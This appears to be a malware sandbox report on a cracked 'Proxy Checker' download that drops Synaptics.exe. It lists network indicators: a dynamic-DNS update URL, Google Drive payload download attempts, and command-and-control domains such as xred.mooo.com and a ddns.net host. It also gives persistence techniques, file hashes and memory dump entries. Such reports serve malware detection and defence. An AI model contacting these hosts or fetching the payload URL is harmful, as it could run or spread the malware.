http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

http

Synaptics.exe

752 B
415 B
13
4

HTTP Request

GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

HTTP Response

200
142.250.200.14:443

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

tls, http

Synaptics.exe

1.9kB
14.0kB
16
17

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

303

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

303

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

303
142.250.187.227:80

http://c.pki.goog/r/r1.crl

http

Synaptics.exe

348 B
1.7kB
5
4

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

200
142.250.187.227:80

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDdY7t7sQcUFRCLMbD9m7%2FC

http

Synaptics.exe

786 B
1.6kB
7
4

HTTP Request

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D

HTTP Response

200

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDdY7t7sQcUFRCLMbD9m7%2FC

HTTP Response

200
142.250.187.225:443

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

tls, http

Synaptics.exe

2.0kB
14.5kB
14
21

HTTP Request

GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404

HTTP Request

GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404

HTTP Request

GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404
92.123.142.59:80

http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

http

399 B
1.7kB
4
4

HTTP Request

GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

HTTP Response

200
95.100.245.144:80

http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

http

393 B
1.7kB
4
4

HTTP Request

GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

HTTP Response

200

8.8.8.8:53

xred.mooo.com

dns

Synaptics.exe

59 B
118 B
1
1

DNS Request

xred.mooo.com
8.8.8.8:53

freedns.afraid.org

dns

Synaptics.exe

64 B
80 B
1
1

DNS Request

freedns.afraid.org

DNS Response

69.42.215.252
8.8.8.8:53

fgtgd33333.ddns.net

dns

svchost.exe

65 B
81 B
1
1

DNS Request

fgtgd33333.ddns.net

DNS Response

0.0.0.0
8.8.8.8:53

docs.google.com

dns

Synaptics.exe

61 B
77 B
1
1

DNS Request

docs.google.com

DNS Response

142.250.200.14
8.8.8.8:53

c.pki.goog

dns

Synaptics.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.187.227
8.8.8.8:53

o.pki.goog

dns

Synaptics.exe

56 B
107 B
1
1

DNS Request

o.pki.goog

DNS Response

142.250.187.227
8.8.8.8:53

drive.usercontent.google.com

dns

Synaptics.exe

74 B
90 B
1
1

DNS Request

drive.usercontent.google.com

DNS Response

142.250.187.225
8.8.8.8:53

crl.microsoft.com

dns

63 B
162 B
1
1

DNS Request

crl.microsoft.com

DNS Response

92.123.142.59

92.123.143.234
8.8.8.8:53

www.microsoft.com

dns

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

95.100.245.144

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
1.1MB

MD5
c23fa9a76be0e91ae95ab347e68a8a17

SHA1
3e8fee7b1729113fa86d53e7eb7135b32d50da96

SHA256
b0356479bb707ba0be06277723150e0401960783d21ab1a97fe76d6723546022

SHA512
6634aac9cb6abbe348fe5befeb1218ed0937713570190a2a1ea05da1b959a17f722eeff5d27d3464ba3f3cf19986d1364cb73b71de76997d99df82ebdb3512eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\BKXlAeur.xlsm

Filesize
17KB

MD5
e566fc53051035e1e6fd0ed1823de0f9

SHA1
00bc96c48b98676ecd67e81a6f1d7754e4156044

SHA256
8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

SHA512
a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\BKXlAeur.xlsm

Filesize
23KB

MD5
4a84c32cd8cdd5bfc78a47cd118d049c

SHA1
16209c349d63b3d45cae2471b37e6a957542c56f

SHA256
7d6b0a489686bccfc3d3a4319554f631b4002d225a9961c7dbce24c1c02faf7a

SHA512
3f2d50dc624f9502310a245645a540b1d49a3cff80f5a04d48cf549b908d4d9585731a561e840baa680923526e93a48e6abcc5d6a24d95b5474cf0cee988a491

Download Submit
\Users\Admin\AppData\Local\Temp\Proxy Checker v0.2\._cache_Proxy Checker v0.2 Crack.exe

Filesize
346KB

MD5
2c35cb3cc2e236e6d12a5e80c5ca8a08

SHA1
fc213a4dd34fa096432850fc4ca899794f36f9d0

SHA256
e7268ad15e40087bcae6d5c42f1c39d6e32456ff33c38b5a7ff876317b456c7b

SHA512
ff4869b16402f0eb84dd8bec2fbaca170b55184c8e2ad10126e1b3b0a4e63fde27d63b89c6dd9679cbf94733a0e6ef52ecf36165430ed86fea95609c213c6455

Download Submit
memory/1804-36-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1804-77-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2768-92-0x0000000000400000-0x0000000000519000-memory.dmp

Filesize
1.1MB

Download
memory/2768-121-0x0000000000400000-0x0000000000519000-memory.dmp

Filesize
1.1MB

Download
memory/2768-79-0x0000000000400000-0x0000000000519000-memory.dmp

Filesize
1.1MB

Download
memory/2884-0-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download
memory/2884-26-0x0000000000400000-0x0000000000519000-memory.dmp

Filesize
1.1MB

Download
memory/3016-17-0x0000000000AC0000-0x0000000000B40000-memory.dmp

Filesize
512KB

Download
memory/3016-81-0x0000000000260000-0x000000000026C000-memory.dmp

Filesize
48KB

Download
memory/3016-78-0x0000000000AC0000-0x0000000000B40000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.